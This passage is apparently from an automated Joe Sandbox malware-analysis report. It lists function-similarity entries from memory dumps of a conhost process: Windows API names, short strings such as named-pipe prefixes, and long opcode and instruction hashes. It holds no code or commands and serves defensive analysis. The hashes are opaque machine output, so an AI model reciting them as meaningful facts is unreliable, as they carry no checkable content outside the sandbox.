                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 6feecfa75cba948cb456dc004c2eb29c23fa3216b8950edd8b9abb0b875a267b
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 9F114D3D201E5843FA76A7215B553AB3152DF8FBF4F144728A836D66EADF68C4018610
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 03c623da116ef67c9c0d32323dd984a926e11518bc05ea2350850e6209fc2daa
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: C6011B35300E4083EB65DB52E95879A73A5FB8DBC4F488039DE9993755DF38C549C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: e3f3324468e23014e45b528825527c3e6b72a87fb8f00ad4e83e310966b7f946
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 37011779215F4083FB769B22EA4879B72B0FB4EB86F044428D98987B65EF3DC1088710
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 186f5b9772127374aeffd287d2a08f1cb98be70df2387860505d511e0080f38b
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 25518E3A615A008BEB67DB15EE48B9A3796F34ABC8F50D524DA4783788DF75C841C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: da40f04bb2948effe222ddafeee504dd6d7f2d75d518595489d269d129bae8f8
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 0B31BF3A204A4097E776DF11ED4879A37A5F34ABC8F059418EE8783789DF39C940C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 3a0f63169b35a715b6c2959e190cbcb935333b6122cdae920269f4ca29fc6972
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: C7F03C76304A4193EBB18B21FAC479A7760FB4DBC8F848025DA8986954DF2CC68DCB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 835f31e3c894f6acd4879f139cc5c1582497ebb4e98aea5d27d4fddc14066169
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: E9F05838608F8483EBA18F13BA0419A7260EB4DFC0F088128EE8A87B18DF2CC485C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 5356f6fb3750f8506e4f22958509b714051eb562be49930f01226f9c0de99fd1
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 05F06279211E0483FB718B29E94539B7320EB8E7A1F54021DCAAAC52E4CF3DC045C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 2c89a862cb55d2a8c980a434173d17a4b014624db5cef7d07aa726abdd436e7d
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: EC02A73A219B8487EB61CB55E99079BB7A1F3CA7D4F104015EA8E87BA9DF7CC454CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: bf016a582cb42783d07870e10c58c4570bcbe4ab660ca89ad760f02accc2f5dd
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: D761A33A619E84C7E7718B15EA4439BB7A0F38D794F504116EA8E87BA8EF7CC544CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: e92d809900a1e8233ce787c337b0df4a5c6d9c3f7035722c980c88031a215828
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 3411513AA20E5113F6FB5669D6673E73145EB7C3B8F18862CA9F6867D6CF24C8414201
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 44a515f911aa13fb0530074d09c6582c9fec5027f9f6840fb0570ee24fdd604a
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 3F11913AA1CE1113FB76192CE7413EB3390EB5D374F588729AD6B876E69F28C841C100
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 2e87d0fc947d2a528583efde5cfaf2800fb3a8064dc66eee5400f6487445ab6b
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: FB61C17E680F0483FA778B29E7403EB7AA0E7AE760F548415CE0A937A4DF34C8458310
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: cf6460fe73c7d77c40ebef720349f4b8c2403eaa0b0bf517143fe4a4a877f792
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: A561563A600B848AEB25DF65DA803DE77A1F349BC8F045215EF4A57BA8DF78C595C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: a6afa8376d9776bba77c3ed8978bb257e1f5d2d09d65b72f42a1cf49e6c00453
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: F1519F7A100E80CBEB798F159A8439E77A0F75ABD4F184215DA99C7BD5CF38D491C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: f1897d4be56fbe81b33b08534ce5637962a00360a38113473d30ad81bc599b9d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 1551903A140B84CBEB7B8F25964439E77A0F369B98F188116DA89C7BD5CF38D491C708
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: c95ca1c51dabbce49b0b4df0f581ec1a112f12749e3785ae99df035bf196c675
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 8551AB3A651B008BEB37CF15E684B9A3799F368B98F508164DE4783788EF34D8428B04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 219dfdab24475d8746ba74a886e252c61bb93e159903f682ed7d8cce1e9cc482
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 17318A3A211B4097EB379F11E98479A37A4F368B88F458014EE5B83785DF38D941C704
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: a4e1e7e1717ff322f57a31a21cfe81a1ca8fcb1273233c841be29153a3399d83
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 14D1D036714E808AE762CFA9D6403ED3BB1F359B98F14821ACE9997B99DF34C416C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: e650c2cfd8f2a67c7857e70869281234a2778628f1bcd30337712c696f864ebc
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: C0115E7A504E90D7E7B6DF66AA0418A77A0F78DFC5F048029DA899372ADF34C451C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 37cfcfd0819629a6c31e1f20f817aff421e14af81e2c9d0ad8073f4b4aae43eb
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 3391AD3A600E5487F7B29F7996803EE3BA4F749B88F14411DDE8AA7A95DF34C486C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: d3019a75ec8cdb39dfaee9deeb1709434ad7af592a6d46799f9ddb4923763fb2
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 11115E3A710F158AEF60CF60E9553EA33A4F71E758F440E25DA6D867A4DF78D1988380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 319f9652b99f525055038a83e84740e41b75fd1cd59cbe1df669afe486ad09a3
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: DD71903A204F8187E7769E26AE443EB7794F38EBC4F440026DD4A93B99DF35D6458B00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 78b47960dca2f246cd9751345394ebd916103ae52a7e666c2bd268e6589482a1
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 6061643AA04B848AEB32DF65D5803DE7BA0F369B88F144216EF4957B98DF38D595C700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 3f9e1e52af2bd9f8d4555ba785bd5b1021212730053515fcb557909e64f47d4e
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: B851B13A208F8183F676DA2AAA983EB7751F39E7C0F450125DE5A83B99DF39C5048750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 60d0abcdc26a4b7ccf8027c4d18f82d1d0bcc890e2baca30bedf8de8e799edd4
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 0E418F36615E8086EB629F25E9443EAB7A0F79CB94F504025EE8DC7798EF3CC441CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: e47fdc159f18074cac7750adb93c462ee715b3c66656f1238279959ef9d42c69
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 97112B36214F8083EB628B25E94439A77E5F789B94F584224EECC87758DF3CC551CB00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 4fa64ed0352c4a96d86b9f695fb7fea17fd1ccd713bcc0cfd7084b169ce72cd3
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: CDE08671650F4891DF178F21E9802D933A4DB6CB64B889122995C46311FF38D1E9C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766119561.000001B0BB950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B0BB950000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb950000_conhost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 9466b7fd6b9877e20a8f56e68a44694e299580f3630cfe8bbc4b3c74deb6152d
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: D4E08C71A51F4881DF278F21E9802D973A4EB6CB64B889122CA4C86322EF38D1E9C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 91fa03bcd9773199c22a075b4fdbf7564ef2da50c42fc2dec94d2d22c506b1cf
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: BF114239601F5482EB65DF67A9042AA77A1F78DFC0F184029DE4D97765DF38C442C300
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1766155786.000001B0BB980000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0BB980000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1b0bb980000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: c3ec68c3203ee89e498dd9908a4f855afe18b7789e2847a7181934456c7c0b64
